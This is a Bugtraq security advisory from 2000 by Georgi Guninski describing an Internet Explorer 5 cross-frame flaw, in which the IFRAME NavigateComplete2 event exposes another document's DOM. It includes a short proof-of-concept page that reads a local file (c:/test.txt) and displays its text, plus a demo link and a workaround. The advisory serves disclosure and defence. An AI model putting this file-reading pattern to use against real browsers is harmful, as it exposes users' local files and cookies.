[15219] in bugtraq
IE 5 Cross-frame security vulnerability using IFRAME and
daemon@ATHENA.MIT.EDU (Georgi Guninski)
Tue Jun 6 15:10:24 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Message-Id: <393CEF33.72D81BB5@nat.bg>
Date: Tue, 6 Jun 2000 15:31:47 +0300
Reply-To: Georgi Guninski <joro@NAT.BG>
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@SECURITYFOCUS.COM
Georgi Guninski security advisory #12, 2000
IE 5 Cross-frame security vulnerability using IFRAME and WebBrowser
control
Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
Internet Explorer 5.01 under Windows 98 (suppose all other versions are
also vulnerable)
allows circumventing "Cross frame security policy" by accessing the DOM
of documents using JavaScript, IFRAME and WebBrowser control.
This exposes the whole DOM of the target document and opens lots of
security risks.
This allows reading local files, reading files from any host, window
spoofing, getting cookies, etc.
Details:
IFRAME seems to be some kind of wrapper of the WebBrowser control and
its events may be captured.
The problem is the NavigateComplete2 event, which when fired, passes an
argument of WebBrowser control.
The WebBrowser control has an accessible property "document" that allows
access to the DOM of the target document.
Note: this is a similar vulnerability to the one discovered by Andrew
Nosenko (which is already fixed):
http://www.ntsecurity.net/go/loader.asp?iD=/security/ie5-17.htm (could
not find a better link)
The code is:
------frame2.html--------------------------------
<IFRAME ID="I1"></IFRAME>
<SCRIPT for=I1 event="NavigateComplete2(b)">
alert("Here is your file:\n"+b.document.body.innerText);
</SCRIPT>
<SCRIPT>
I1.navigate("file://c:/test.txt");
setTimeout('I1.navigate("file://c:/test.txt")',1000);
</SCRIPT>
---------------------------------------------------
Demonstration is available at: http://www.nat.bg/~joro/frame2.html
Workaround: Disable Active Scripting
Copyright 2000 Georgi Guninski
Regards,
Georgi Guninski
http://www.nat.bg/~joro
